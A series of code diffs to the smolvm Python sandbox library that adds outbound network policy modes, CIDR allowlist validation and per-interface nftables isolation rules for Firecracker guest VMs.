@@ -982,9 +982,11 @@ class SmolVM:
             actually tried.)
         internet_settings: Network access controls. Accepts an
             :class:`~smolvm.types.InternetSettings` instance or a dict
-            (e.g. ``{"allowed_domains": ["https://example.com/"]}``).
+            (e.g. ``{"mode": "off"}``). Use ``InternetSettings(mode="off")``
+            for typed construction. Unknown settings are rejected before image preparation.
             Explicit off/restricted modes require Linux Firecracker and vsock.
-            Legacy domain lists allow setup-time resolved IPs, not verified hostnames.
+            Policy is immutable after creation. Legacy domain lists allow setup-time
+            resolved IPs, not verified hostnames; HTTP-method filtering is unsupported.
         mounts: Host directories to mount inside the guest, as
             ``HOST_PATH[:GUEST_PATH]`` strings. Equivalent to passing
             ``WorkspaceMount`` instances on a :class:`VMConfig`.
@@ -997,6 +999,9 @@ class SmolVM:
             ``config.workspace_mounts`` instead.
 
     Raises:
+        ValidationError: Invalid or unsupported network policy; details include field
+            errors for invalid settings. Direct InternetSettings construction uses
+            Pydantic's ValidationError instead.
         ValueError: If both *config* and *vm_id* are given, or if auto-config-only
             options are used together with either of them.
     """
@@ -1098,9 +1103,9 @@ class SmolVM:
                     "Windows guests in this release; drop the mounts= arg."
                 )
             if internet_settings is not None:
-                raise ValueError(
-                    "Egress controls (internet_settings=) are not yet "
-                    "supported for Windows guests; drop the internet_settings= arg."
+                raise ValidationError(
+                    "Windows guests do not support internet_settings; use a Linux guest "
+                    "on Linux with backend='firecracker' and comm_channel='vsock'."
                 )
 
         # Workspace mounts currently require the QEMU backend (virtio-9p).
@@ -2494,7 +2499,7 @@ class SmolVM:
         if settings is not None and settings.has_explicit_restrictions:
             raise SmolVMError(
                 f"Sandbox '{self._vm_id}' does not support exposed ports with this network mode; "
-                f"run 'smolvm sandbox delete {self._vm_id}' and recreate it with mode='open'."
+                "create a separate sandbox with mode='open' if you need exposed ports."
             )
 
         if self._info.status != VMState.RUNNING:

--- a/src/smolvm/facade.py
+++ b/src/smolvm/facade.py
@@ -981,7 +981,8 @@ class SmolVM:
         internet_settings: Network access controls. Accepts an
             :class:`~smolvm.types.InternetSettings` instance or a dict
             (e.g. ``{"allowed_domains": ["https://example.com/"]}``).
-            When set, only the listed domains are reachable from the VM.
+            Explicit off/restricted modes require Linux Firecracker and vsock.
+            Legacy domain lists allow setup-time resolved IPs, not verified hostnames.
         mounts: Host directories to mount inside the guest, as
             ``HOST_PATH[:GUEST_PATH]`` strings. Equivalent to passing
             ``WorkspaceMount`` instances on a :class:`VMConfig`.
@@ -2463,6 +2464,12 @@ class SmolVM:
             The host localhost port to connect to.
         """
         self._refresh_info()
+        settings = self._info.config.internet_settings
+        if settings is not None and settings.has_explicit_restrictions:
+            raise SmolVMError(
+                f"Sandbox '{self._vm_id}' does not support exposed ports with this network mode; "
+                f"run 'smolvm sandbox delete {self._vm_id}' and recreate it with mode='open'."
+            )
 
         if self._info.status != VMState.RUNNING:
             raise SmolVMError(

--- a/src/smolvm/facade.py
+++ b/src/smolvm/facade.py
@@ -47,6 +47,7 @@ from pydantic import TypeAdapter
 from pydantic import ValidationError as PydanticValidationError
 
 from smolvm._naming import generate_sandbox_name
+from smolvm._network_policy import parse_network_policy, validate_network_policy_options
 from smolvm.callbacks import Callback, CallbackDispatcher, RunContext
 from smolvm.comm import RustHttpVsockChannel
 from smolvm.comm.base import CommChannel, CommChannelKind
@@ -65,6 +66,7 @@ from smolvm.exceptions import (
     CommandExecutionUnavailableError,
     OperationTimeoutError,
     SmolVMError,
+    ValidationError,
 )
 from smolvm.images.boot import BootImage
 from smolvm.images.cloud_init import (
@@ -1022,6 +1024,32 @@ class SmolVM:
         callbacks: list[Callback] | None = None,
         state_manager: StateManagerProtocol | None = None,
     ) -> None:
+        if internet_settings is not None:
+            if vm_id is not None:
+                raise ValidationError("Policy cannot change on reconnect; omit internet_settings.")
+            if config is not None and config.internet_settings is not None:
+                raise ValidationError(
+                    "internet_settings is already set on VMConfig; pass it in one place only."
+                )
+            internet_settings = parse_network_policy(internet_settings)
+        policy = internet_settings or (config.internet_settings if config is not None else None)
+        if policy is not None:
+            policy = parse_network_policy(policy)
+            if not policy.is_allow_all_domains:
+                policy_backend = backend or (config.backend if config is not None else None)
+                if policy_backend is None and (mounts or (config and config.workspace_mounts)):
+                    policy_backend = BACKEND_QEMU
+                validate_network_policy_options(
+                    policy,
+                    backend=resolve_backend(policy_backend),
+                    guest_os=config.guest_os if config is not None else (os or GuestOS.ALPINE),
+                    comm_channel=comm_channel or (config.comm_channel if config else None),
+                    has_mounts=bool(mounts or (config and config.workspace_mounts)),
+                    has_forwards=bool(config and config.port_forwards),
+                    network_mode=config.network_attachment.mode if config else "nat",
+                    qemu_network=config.qemu_network if config else "slirp",
+                )
+
         if config is not None and vm_id is not None:
             raise ValueError("Provide either config or vm_id, not both.")
 
@@ -1127,21 +1155,8 @@ class SmolVM:
                 data_dir=data_dir,
             )
 
-        # Normalize and merge internet_settings into the config
-        if internet_settings is not None:
-            if vm_id is not None:
-                raise ValueError(
-                    "internet_settings cannot be set when reconnecting to an existing VM."
-                )
-            if isinstance(internet_settings, dict):
-                internet_settings = InternetSettings(**internet_settings)
-            if config is not None and config.internet_settings is not None:
-                raise ValueError(
-                    "internet_settings is already set on the provided VMConfig; "
-                    "pass it in one place only (either on the config or as a keyword argument)."
-                )
-            if config is not None:
-                config = config.model_copy(update={"internet_settings": internet_settings})
+        if internet_settings is not None and config is not None:
+            config = config.model_copy(update={"internet_settings": internet_settings})
 
         # Normalize and merge mounts into the config
         if mounts is not None:
@@ -1472,6 +1487,17 @@ class SmolVM:
         per-VM runtime settings and delegates disk isolation/network setup to
         the normal SmolVM lifecycle.
         """
+        if internet_settings is not None:
+            internet_settings = parse_network_policy(internet_settings)
+            validate_network_policy_options(
+                internet_settings,
+                backend=_normalize_from_image_backend(image, backend, vm_id or "sandbox"),
+                guest_os=guest_os,
+                comm_channel=comm_channel,
+                has_mounts=bool(mounts),
+                has_forwards=bool(port_forwards),
+                qemu_network=network or "slirp",
+            )
         resolved_vm_id = _resolve_vm_name(vm_id, prefix=name_prefix)
 
         resolved_backend = _normalize_from_image_backend(image, backend, resolved_vm_id)

--- a/src/smolvm/host/network.py
+++ b/src/smolvm/host/network.py
@@ -29,6 +29,7 @@ import time
 from collections.abc import Callable
 from contextlib import suppress
 from dataclasses import dataclass
+from ipaddress import IPv4Network, collapse_addresses
 from pathlib import Path
 from typing import TypeVar
 from urllib.parse import urlparse
@@ -1366,7 +1367,7 @@ class NetworkManager:
     # Public firewall/NAT API
     # ------------------------------------------------------------------
 
-    def setup_nat(self, tap_name: str) -> None:
+    def setup_nat(self, tap_name: str, *, allow_outbound: bool = True) -> None:
         """Configure outbound NAT and forwarding for a TAP device."""
         if not tap_name:
             raise ValueError("tap_name cannot be empty")
@@ -1406,13 +1407,16 @@ class NetworkManager:
             ]
         )
 
+        if not allow_outbound:
+            return
+
         # Per-TAP: add to allowed_taps set (O(1), idempotent).
         self._run_nft_script(
             f"add element {_NFT_FILTER_FAMILY} {_NFT_FILTER_TABLE}"
             f" {_NFT_SET_ALLOWED_TAPS} {{ {self._quote(tap_name)} }}\n"
         )
 
-    async def async_setup_nat(self, tap_name: str) -> None:
+    async def async_setup_nat(self, tap_name: str, *, allow_outbound: bool = True) -> None:
         """Configure outbound NAT and forwarding for a TAP device (async)."""
         if not tap_name:
             raise ValueError("tap_name cannot be empty")
@@ -1454,6 +1458,9 @@ class NetworkManager:
                 ),
             ]
         )
+
+        if not allow_outbound:
+            return
 
         # Per-TAP: add to allowed_taps set (O(1), idempotent).
         await self._async_run_nft_script(
@@ -1842,6 +1849,86 @@ class NetworkManager:
             _NFT_FILTER_TABLE,
             comment=comment,
         )
+
+    @staticmethod
+    def _policy_table(tap_device: str) -> str:
+        if not re.fullmatch(r"tap[0-9]+", tap_device):
+            raise ValueError("Network policy requires a managed NAT interface.")
+        return f"smolvm_policy_{tap_device}"
+
+    def _network_policy_script(self, tap_device: str, allowed_ips: list[str] | None) -> str:
+        """Replace one policy atomically, ahead of all ordinary forwarding accepts.
+
+        None preserves open access; [] denies all. No connection-state exemption:
+        stale conntrack entries cannot override the destination policy on reuse.
+        A separate owned table avoids handle discovery and cross-VM update races.
+        """
+        table = self._policy_table(tap_device)
+        tap = self._quote(tap_device)
+        destinations = (
+            None
+            if allowed_ips is None
+            else [
+                str(network)
+                for network in collapse_addresses(IPv4Network(ip) for ip in allowed_ips)
+            ]
+        )
+        lines = [
+            f"add table inet {table}",
+            f"flush table inet {table}",
+            f"add chain inet {table} forward "
+            "{ type filter hook forward priority -10; policy accept; }",
+            f"add chain inet {table} input "
+            "{ type filter hook input priority -10; policy accept; }",
+            f'add rule inet {table} forward iifname {tap} oifname "tap*" counter drop',
+            f"add rule inet {table} forward iifname {tap} ip daddr 169.254.0.0/16 counter drop",
+            f"add rule inet {table} input iifname {tap} ip daddr 169.254.0.0/16 counter drop",
+        ]
+        if destinations is not None:
+            lines.extend(
+                [
+                    f"add rule inet {table} input iifname {tap} counter drop",
+                    f"add rule inet {table} forward iifname {tap} meta nfproto ipv6 counter drop",
+                ]
+            )
+            if destinations:
+                lines.append(
+                    f"add rule inet {table} forward iifname {tap} "
+                    f"ip daddr {{ {', '.join(destinations)} }} counter accept"
+                )
+            lines.append(f"add rule inet {table} forward iifname {tap} counter drop")
+            # add+delete is idempotent even if the element is already absent.
+            # This is in the SAME transaction as the replacement policy.
+            lines.extend(
+                [
+                    f"add element inet {_NFT_FILTER_TABLE} {_NFT_SET_ALLOWED_TAPS} {{ {tap} }}",
+                    f"delete element inet {_NFT_FILTER_TABLE} {_NFT_SET_ALLOWED_TAPS} {{ {tap} }}",
+                ]
+            )
+        return "\n".join(lines) + "\n"
+
+    def apply_network_policy(self, tap_device: str, allowed_ips: list[str] | None) -> None:
+        """Install open isolation, off, or an IPv4 allowlist before guest execution."""
+        script = self._network_policy_script(tap_device, allowed_ips)
+        self._ensure_nftables_base()
+        self._run_nft_script(script)
+
+    async def async_apply_network_policy(
+        self, tap_device: str, allowed_ips: list[str] | None
+    ) -> None:
+        """Async counterpart using exactly the same transaction."""
+        script = self._network_policy_script(tap_device, allowed_ips)
+        await self._async_ensure_nftables_base()
+        await self._async_run_nft_script(script)
+
+    def remove_network_policy(self, tap_device: str) -> None:
+        """Idempotently delete only this managed interface's policy table."""
+        table = self._policy_table(tap_device)
+        self._run_nft_script(f"add table inet {table}\ndelete table inet {table}\n")
+
+    async def async_remove_network_policy(self, tap_device: str) -> None:
+        table = self._policy_table(tap_device)
+        await self._async_run_nft_script(f"add table inet {table}\ndelete table inet {table}\n")
 
     def _egress_rule_lines(self, tap_device: str, allowed_ips: list[str]) -> list[str]:
         """Build the nft rules enforcing an egress allowlist for one TAP.

--- a/src/smolvm/host/network.py
+++ b/src/smolvm/host/network.py
@@ -26,7 +26,7 @@ import os
 import re
 import socket
 import time
-from collections.abc import Callable
+from collections.abc import Callable, Sequence
 from contextlib import suppress
 from dataclasses import dataclass
 from ipaddress import IPv4Network, collapse_addresses
@@ -2512,7 +2512,7 @@ def _extract_hostname(entry: str) -> str:
     return entry.split(":")[0]
 
 
-def resolve_domains_to_ips(domains: list[str]) -> list[str]:
+def resolve_domains_to_ips(domains: Sequence[str]) -> list[str]:
     """Resolve a list of domain entries to unique IP addresses.
 
     Each entry can be a full URL (``https://example.com/path``) or a bare

--- a/src/smolvm/types.py
+++ b/src/smolvm/types.py
@@ -306,7 +306,24 @@ class InternetSettings(BaseModel):
     @field_validator("allowed_cidrs")
     @classmethod
     def normalize_cidrs(cls, values: list[str]) -> list[str]:
-        networks = [IPv4Network(value.strip()) for value in values]
+        networks = []
+        for value in values:
+            try:
+                network = IPv4Network(value.strip())
+            except ValueError:
+                try:
+                    corrected = IPv4Network(value.strip(), strict=False)
+                except ValueError:
+                    raise ValueError(
+                        f"Invalid IPv4 address or range {value!r}; use an address such as "
+                        "'203.0.113.10' or a range such as '10.20.0.0/24'."
+                    ) from None
+                raise ValueError(
+                    f"Range {value!r} must start at its first address; "
+                    f"use '{corrected}' for the range or remove the slash and prefix "
+                    "to allow only one address."
+                ) from None
+            networks.append(network)
         forbidden = (IPv4Network("172.16.0.0/16"), IPv4Network("169.254.0.0/16"))
         if any(network.overlaps(block) for network in networks for block in forbidden):
             raise ValueError(
@@ -624,8 +641,9 @@ class VMConfig(BaseModel):
                 and not self.internet_settings.is_allow_all_domains
             ):
                 raise ValueError(
-                    "macOS guests do not support domain restrictions in this release; "
-                    "remove internet_settings"
+                    "macOS guests do not support network restrictions in this release; "
+                    "use a Linux guest on Linux with backend='firecracker' "
+                    "and comm_channel='vsock'."
                 )
             return self
 
@@ -701,8 +719,8 @@ class VMConfig(BaseModel):
             )
         if self.internet_settings is not None and not self.internet_settings.is_allow_all_domains:
             raise ValueError(
-                "Domain allow-lists are not enforced in bridge mode; "
-                "remove internet_settings or use NAT mode."
+                "Network restrictions are not supported with bridge networking; "
+                "set network_attachment={'mode': 'nat'} to use private networking."
             )
         return self
 

--- a/src/smolvm/types.py
+++ b/src/smolvm/types.py
@@ -417,7 +417,7 @@ class InternetSettings(BaseModel):
         """Whether all domains are allowed (wildcard)."""
         return not self.has_explicit_restrictions and "*" in self.allowed_domains
 
-    model_config = {"frozen": True}
+    model_config = {"frozen": True, "extra": "forbid"}
 
 
 class NetworkAttachmentConfig(BaseModel):

--- a/src/smolvm/types.py
+++ b/src/smolvm/types.py
@@ -17,6 +17,7 @@
 import re
 from datetime import datetime
 from enum import Enum
+from ipaddress import IPv4Network, collapse_addresses
 from pathlib import Path
 from typing import Annotated, Any, Literal, Protocol
 from urllib.parse import urlparse
@@ -291,23 +292,51 @@ class DesktopEndpoint(BaseModel):
 
 
 class InternetSettings(BaseModel):
-    """Network access controls for a VM.
+    """Outbound access settings; explicit restrictions require Firecracker and vsock.
 
-    Restricts which external domains (and eventually HTTP methods) the guest
-    can reach.  Domain entries may be full URLs (``https://example.com/path``)
-    or bare hostnames (``example.com``).  The special value ``"*"`` means
-    "allow everything" (the default).
-
-    Attributes:
-        allowed_domains: Domains the guest may connect to.
-            Accepts URLs or bare hostnames.  Default ``["*"]`` allows all.
-        allowed_http_methods: HTTP methods the guest may use.
-            Default ``["*"]`` allows all.  **Not enforced yet** — reserved
-            for a future proxy-based implementation.
+    Legacy allowed_domains resolves names to IPv4 addresses at setup time; it
+    does not verify hostnames on connections. HTTP method filtering is unsupported.
     """
 
+    mode: Literal["open", "off", "restricted"] | None = None
+    allowed_cidrs: list[str] = Field(default_factory=list)
     allowed_domains: list[str] = ["*"]
     allowed_http_methods: list[str] = ["*"]
+
+    @field_validator("allowed_cidrs")
+    @classmethod
+    def normalize_cidrs(cls, values: list[str]) -> list[str]:
+        networks = [IPv4Network(value.strip()) for value in values]
+        forbidden = (IPv4Network("172.16.0.0/16"), IPv4Network("169.254.0.0/16"))
+        if any(network.overlaps(block) for network in networks for block in forbidden):
+            raise ValueError(
+                "Sandbox and link-local addresses cannot be allowed; remove those ranges."
+            )
+        return [str(network) for network in collapse_addresses(networks)]
+
+    @model_validator(mode="after")
+    def validate_policy(self) -> "InternetSettings":
+        if self.allowed_http_methods != ["*"]:
+            raise ValueError(
+                "HTTP method restrictions are unsupported; remove allowed_http_methods."
+            )
+        if self.mode is not None and self.allowed_domains != ["*"]:
+            raise ValueError(
+                "Use either mode or allowed_domains, not both; remove allowed_domains."
+            )
+        if self.mode == "restricted" and not self.allowed_cidrs:
+            raise ValueError(
+                "restricted requires allowed_cidrs; use mode='off' to deny all access."
+            )
+        if self.mode != "restricted" and self.allowed_cidrs:
+            raise ValueError(
+                "allowed_cidrs requires mode='restricted'; set that mode or remove the list."
+            )
+        return self
+
+    @property
+    def has_explicit_restrictions(self) -> bool:
+        return self.mode in {"off", "restricted"}
 
     @field_validator("allowed_domains")
     @classmethod
@@ -369,7 +398,7 @@ class InternetSettings(BaseModel):
     @property
     def is_allow_all_domains(self) -> bool:
         """Whether all domains are allowed (wildcard)."""
-        return "*" in self.allowed_domains
+        return not self.has_explicit_restrictions and "*" in self.allowed_domains
 
     model_config = {"frozen": True}
 

--- a/src/smolvm/types.py
+++ b/src/smolvm/types.py
@@ -299,13 +299,13 @@ class InternetSettings(BaseModel):
     """
 
     mode: Literal["open", "off", "restricted"] | None = None
-    allowed_cidrs: list[str] = Field(default_factory=list)
-    allowed_domains: list[str] = ["*"]
-    allowed_http_methods: list[str] = ["*"]
+    allowed_cidrs: tuple[str, ...] = ()
+    allowed_domains: tuple[str, ...] = ("*",)
+    allowed_http_methods: tuple[str, ...] = ("*",)
 
     @field_validator("allowed_cidrs")
     @classmethod
-    def normalize_cidrs(cls, values: list[str]) -> list[str]:
+    def normalize_cidrs(cls, values: tuple[str, ...]) -> tuple[str, ...]:
         networks = []
         for value in values:
             try:
@@ -329,15 +329,15 @@ class InternetSettings(BaseModel):
             raise ValueError(
                 "Sandbox and link-local addresses cannot be allowed; remove those ranges."
             )
-        return [str(network) for network in collapse_addresses(networks)]
+        return tuple(str(network) for network in collapse_addresses(networks))
 
     @model_validator(mode="after")
     def validate_policy(self) -> "InternetSettings":
-        if self.allowed_http_methods != ["*"]:
+        if self.allowed_http_methods != ("*",):
             raise ValueError(
                 "HTTP method restrictions are unsupported; remove allowed_http_methods."
             )
-        if self.mode is not None and self.allowed_domains != ["*"]:
+        if self.mode is not None and self.allowed_domains != ("*",):
             raise ValueError(
                 "Use either mode or allowed_domains, not both; remove allowed_domains."
             )
@@ -357,7 +357,7 @@ class InternetSettings(BaseModel):
 
     @field_validator("allowed_domains")
     @classmethod
-    def normalize_domains(cls, v: list[str]) -> list[str]:
+    def normalize_domains(cls, v: tuple[str, ...]) -> tuple[str, ...]:
         """Extract and store only lowercased hostnames."""
         normalized: list[str] = []
         for entry in v:
@@ -392,11 +392,11 @@ class InternetSettings(BaseModel):
                 normalized.append(hostname.lower())
         if not normalized:
             raise ValueError("allowed_domains must contain at least one entry")
-        return normalized
+        return tuple(normalized)
 
     @field_validator("allowed_http_methods")
     @classmethod
-    def normalize_methods(cls, v: list[str]) -> list[str]:
+    def normalize_methods(cls, v: tuple[str, ...]) -> tuple[str, ...]:
         """Uppercase and deduplicate HTTP method entries."""
         normalized: list[str] = []
         seen: set[str] = set()
@@ -410,7 +410,7 @@ class InternetSettings(BaseModel):
             normalized.append(method)
         if not normalized:
             raise ValueError("allowed_http_methods must contain at least one entry")
-        return normalized
+        return tuple(normalized)
 
     @property
     def is_allow_all_domains(self) -> bool:

--- a/src/smolvm/vm.py
+++ b/src/smolvm/vm.py
@@ -1635,7 +1635,10 @@ class SmolVMManager:
         settings = InternetSettings.model_validate(settings.model_dump())
         if settings.is_allow_all_domains:
             return
-        recovery = "Use supported settings or remove internet_settings before creating the sandbox."
+        recovery = (
+            "Create it on Linux with backend='firecracker', comm_channel='vsock', "
+            "and default private networking instead of a bridge."
+        )
         if config.network_attachment.mode != "nat" or not self._uses_host_tap_networking(
             config, backend
         ):
@@ -1651,11 +1654,13 @@ class SmolVMManager:
             if config.workspace_mounts or config.port_forwards:
                 raise SmolVMError(
                     f"Sandbox '{config.vm_id}' cannot use shared folders or exposed ports "
-                    f"with this network mode. {recovery}"
+                    "with this network mode; remove workspace_mounts and port_forwards "
+                    "before creating it."
                 )
             if self._resolve_control_channel_for_config(config, backend).kind != "vsock":
                 raise SmolVMError(
-                    f"Sandbox '{config.vm_id}' requires comm_channel='vsock'. {recovery}"
+                    f"Sandbox '{config.vm_id}' requires a direct command connection for this "
+                    "network mode; set comm_channel='vsock' before creating it."
                 )
 
     @staticmethod

--- a/src/smolvm/vm.py
+++ b/src/smolvm/vm.py
@@ -85,6 +85,7 @@ from smolvm.storage import (
 from smolvm.storage._base import VSOCK_CID_END, VSOCK_CID_START
 from smolvm.types import (
     GuestOS,
+    InternetSettings,
     NetworkConfig,
     RootfsFormat,
     SnapshotCapturePolicy,
@@ -1412,12 +1413,18 @@ class SmolVMManager:
             netmask="32",
         )
         self.network.add_route(network.guest_ip, network.tap_device)
-        self.network.setup_nat(network.tap_device)
+        if vm_config is None:
+            self.network.apply_network_policy(network.tap_device, None)
+            self.network.setup_nat(network.tap_device)
+        else:
+            self._validate_network_policy(vm_config, self._backend_for_config(vm_config))
+            self._setup_policy_network(vm_config, network.tap_device)
 
         # Re-apply domain allowlist if the original config had one
         if (
             vm_config is not None
             and vm_config.internet_settings is not None
+            and vm_config.internet_settings.mode is None
             and not vm_config.internet_settings.is_allow_all_domains
         ):
             allowed_ips = resolve_domains_to_ips(vm_config.internet_settings.allowed_domains)
@@ -1447,6 +1454,8 @@ class SmolVMManager:
             self.network.cleanup_nat_rules(network.tap_device)
         with suppress(Exception):
             self.network.cleanup_tap(network.tap_device)
+        with suppress(Exception):
+            self.network.remove_network_policy(network.tap_device)
 
     def _qemu_binary_candidates(self) -> list[str]:
         """Return architecture-aware qemu-system binary candidates."""
@@ -1616,12 +1625,69 @@ class SmolVMManager:
         resolution = resolution or self._resolve_control_channel_for_config(config, backend)
         return resolution.kind == "ssh"
 
+    def _validate_network_policy(self, config: VMConfig, backend: str) -> None:
+        """Validate after configuration merges and before any resources are allocated."""
+        settings = config.internet_settings
+        if settings is None:
+            return
+        # Frozen Pydantic models still contain mutable lists; model_copy also
+        # bypasses validation. Revalidate at the execution boundary.
+        settings = InternetSettings.model_validate(settings.model_dump())
+        if settings.is_allow_all_domains:
+            return
+        recovery = "Use supported settings or remove internet_settings before creating the sandbox."
+        if config.network_attachment.mode != "nat" or not self._uses_host_tap_networking(
+            config, backend
+        ):
+            raise SmolVMError(
+                f"Sandbox '{config.vm_id}' cannot enforce network restrictions. {recovery}"
+            )
+        if settings.has_explicit_restrictions:
+            if backend != BACKEND_FIRECRACKER or sys.platform != "linux":
+                raise SmolVMError(
+                    f"Sandbox '{config.vm_id}' requires Linux Firecracker for this network mode. "
+                    f"{recovery}"
+                )
+            if config.workspace_mounts or config.port_forwards:
+                raise SmolVMError(
+                    f"Sandbox '{config.vm_id}' cannot use shared folders or exposed ports "
+                    f"with this network mode. {recovery}"
+                )
+            if self._resolve_control_channel_for_config(config, backend).kind != "vsock":
+                raise SmolVMError(
+                    f"Sandbox '{config.vm_id}' requires comm_channel='vsock'. {recovery}"
+                )
+
+    @staticmethod
+    def _policy_destinations(config: VMConfig) -> list[str] | None:
+        settings = config.internet_settings
+        if settings is not None and settings.has_explicit_restrictions:
+            return settings.allowed_cidrs
+        return None
+
+    def _setup_policy_network(self, config: VMConfig, tap_device: str) -> None:
+        destinations = self._policy_destinations(config)
+        self.network.apply_network_policy(tap_device, destinations)
+        if destinations is None:
+            self.network.setup_nat(tap_device)
+        else:
+            self.network.setup_nat(tap_device, allow_outbound=False)
+
+    async def _async_setup_policy_network(self, config: VMConfig, tap_device: str) -> None:
+        destinations = self._policy_destinations(config)
+        await self.network.async_apply_network_policy(tap_device, destinations)
+        if destinations is None:
+            await self.network.async_setup_nat(tap_device)
+        else:
+            await self.network.async_setup_nat(tap_device, allow_outbound=False)
+
     def ensure_network_connectivity(self, vm_info: VMInfo) -> None:
         """Ensure host-side TAP connectivity exists for network-backed operations."""
         if vm_info.network is None:
             return
 
         backend = self._backend_for_vm(vm_info)
+        self._validate_network_policy(vm_info.config, backend)
         if not self._uses_host_tap_networking(vm_info.config, backend):
             return
 
@@ -1638,10 +1704,11 @@ class SmolVMManager:
             return
 
         self.network.add_route(network.guest_ip, network.tap_device)
-        self.network.setup_nat(network.tap_device)
+        self._setup_policy_network(vm_info.config, network.tap_device)
 
         if (
             vm_info.config.internet_settings is not None
+            and vm_info.config.internet_settings.mode is None
             and not vm_info.config.internet_settings.is_allow_all_domains
         ):
             allowed_ips = resolve_domains_to_ips(vm_info.config.internet_settings.allowed_domains)
@@ -2003,6 +2070,8 @@ class SmolVMManager:
             resolution = self._resolve_control_channel_for_config(effective_config, backend)
             self._validate_bridge_mode(effective_config, backend, resolution)
 
+        self._validate_network_policy(effective_config, backend)
+
         with self._vm_create_lock(effective_config.vm_id):
             self._ensure_vm_id_available(effective_config.vm_id)
             managed_disk_path = self._managed_disk_path_for_create(effective_config, backend)
@@ -2130,15 +2199,6 @@ class SmolVMManager:
             )
 
             if not self._uses_host_tap_networking(effective_config, backend):
-                if (
-                    effective_config.internet_settings is not None
-                    and not effective_config.internet_settings.is_allow_all_domains
-                ):
-                    logger.warning(
-                        "internet_settings domain allowlist is not supported "
-                        "with the %s backend (user-mode networking)",
-                        backend,
-                    )
                 mac_seed = ((ssh_host_port or SSH_PORT_START) % 65534) + 1
                 guest_mac = self.network.generate_mac(mac_seed)
                 guest_ip, gateway_ip, netmask = _usernet_addresses(backend, effective_config.vm_id)
@@ -2183,11 +2243,12 @@ class SmolVMManager:
             self.network.prepare_tap_device(tap_name, user=user, netmask="32")
 
             self.network.add_route(guest_ip, tap_name)
-            self.network.setup_nat(tap_name)
+            self._setup_policy_network(effective_config, tap_name)
 
             # Apply domain allowlist if configured
             if (
                 effective_config.internet_settings is not None
+                and effective_config.internet_settings.mode is None
                 and not effective_config.internet_settings.is_allow_all_domains
             ):
                 allowed_ips = resolve_domains_to_ips(
@@ -2283,6 +2344,13 @@ class SmolVMManager:
         self._check_workspace_mounts(vm_info)
 
         backend = self._backend_for_vm(vm_info)
+        self._validate_network_policy(vm_info.config, backend)
+        if (
+            vm_info.config.internet_settings is not None
+            and vm_info.config.internet_settings.has_explicit_restrictions
+        ):
+            self.ensure_network_connectivity(vm_info)
+
         if backend == BACKEND_VZ:
             self._enforce_macos_concurrency_limit(vm_id)
 
@@ -2391,6 +2459,12 @@ class SmolVMManager:
         if vm_info.status != VMState.PAUSED:
             self._raise_crashed_or_state_error(vm_info, action="resume")
 
+        self._validate_network_policy(vm_info.config, self._backend_for_vm(vm_info))
+        if (
+            vm_info.config.internet_settings is not None
+            and vm_info.config.internet_settings.has_explicit_restrictions
+        ):
+            self.ensure_network_connectivity(vm_info)
         try:
             self._runtime_adapter_for_vm(vm_info).resume(vm_info)
         except Exception:
@@ -2887,6 +2961,7 @@ class SmolVMManager:
                 update={"rootfs_path": restore_disk_path}
             )
         effective_snapshot = snapshot.model_copy(update={"vm_config": restore_vm_config})
+        self._validate_network_policy(effective_snapshot.vm_config, effective_snapshot.backend)
         adapter = self._runtime_adapter_for_snapshot(effective_snapshot)
         if effective_snapshot.network_config.mode == "bridge":
             configured_bridge = effective_snapshot.vm_config.network_attachment.bridge
@@ -3827,6 +3902,8 @@ class SmolVMManager:
                         self.network.cleanup_nat_rules(tap_device)
                     with self._cleanup_step(vm_id, "remove the host network device"):
                         self.network.cleanup_tap(tap_device)
+                    with self._cleanup_step(vm_id, "remove network policy"):
+                        self.network.remove_network_policy(tap_device)
 
                 # Release IP lease regardless of backend.
                 with self._cleanup_step(vm_id, "release the IP address"):
@@ -4189,6 +4266,8 @@ class SmolVMManager:
                 resolution,
             )
 
+        self._validate_network_policy(effective_config, backend)
+
         async with self._async_vm_create_lock(effective_config.vm_id):
             self._ensure_vm_id_available(effective_config.vm_id)
             managed_disk_path = self._managed_disk_path_for_create(effective_config, backend)
@@ -4326,15 +4405,6 @@ class SmolVMManager:
             )
 
             if not self._uses_host_tap_networking(effective_config, backend):
-                if (
-                    effective_config.internet_settings is not None
-                    and not effective_config.internet_settings.is_allow_all_domains
-                ):
-                    logger.warning(
-                        "internet_settings domain allowlist is not supported "
-                        "with the %s backend (user-mode networking)",
-                        backend,
-                    )
                 mac_seed = ((ssh_host_port or SSH_PORT_START) % 65534) + 1
                 guest_mac = self.network.generate_mac(mac_seed)
                 guest_ip, gateway_ip, netmask = _usernet_addresses(backend, effective_config.vm_id)
@@ -4359,11 +4429,12 @@ class SmolVMManager:
             user = os.environ.get("USER", "root")
             await self.network.async_prepare_tap_device(tap_name, user=user, netmask="32")
             await self.network.async_add_route(guest_ip, tap_name)
-            await self.network.async_setup_nat(tap_name)
+            await self._async_setup_policy_network(effective_config, tap_name)
 
             # Apply domain allowlist if configured
             if (
                 effective_config.internet_settings is not None
+                and effective_config.internet_settings.mode is None
                 and not effective_config.internet_settings.is_allow_all_domains
             ):
                 allowed_ips = resolve_domains_to_ips(
@@ -4429,6 +4500,13 @@ class SmolVMManager:
         self._check_workspace_mounts(vm_info)
 
         backend = self._backend_for_vm(vm_info)
+        self._validate_network_policy(vm_info.config, backend)
+        if (
+            vm_info.config.internet_settings is not None
+            and vm_info.config.internet_settings.has_explicit_restrictions
+        ):
+            await asyncio.to_thread(self.ensure_network_connectivity, vm_info)
+
         if backend == BACKEND_VZ:
             self._enforce_macos_concurrency_limit(vm_id)
 
@@ -4779,6 +4857,8 @@ class SmolVMManager:
                         await self.network.async_cleanup_nat_rules(tap_device)
                     with self._cleanup_step(vm_id, "remove the host network device"):
                         await self.network.async_cleanup_tap(tap_device)
+                    with self._cleanup_step(vm_id, "remove network policy"):
+                        await self.network.async_remove_network_policy(tap_device)
 
                 with self._cleanup_step(vm_id, "release the IP address"):
                     self.state.release_ip(vm_id)

--- a/src/smolvm/vm.py
+++ b/src/smolvm/vm.py
@@ -1646,7 +1646,7 @@ class SmolVMManager:
     def _policy_destinations(config: VMConfig) -> list[str] | None:
         settings = config.internet_settings
         if settings is not None and settings.has_explicit_restrictions:
-            return settings.allowed_cidrs
+            return list(settings.allowed_cidrs)
         return None
 
     def _setup_policy_network(self, config: VMConfig, tap_device: str) -> None:

--- a/src/smolvm/vm.py
+++ b/src/smolvm/vm.py
@@ -42,6 +42,7 @@ from pathlib import Path
 from typing import Any, TextIO
 from uuid import uuid4
 
+from smolvm._network_policy import parse_network_policy, validate_network_policy_options
 from smolvm.comm.select import ChannelResolution, VsockNotSupportedError, resolve_comm_channel
 from smolvm.exceptions import (
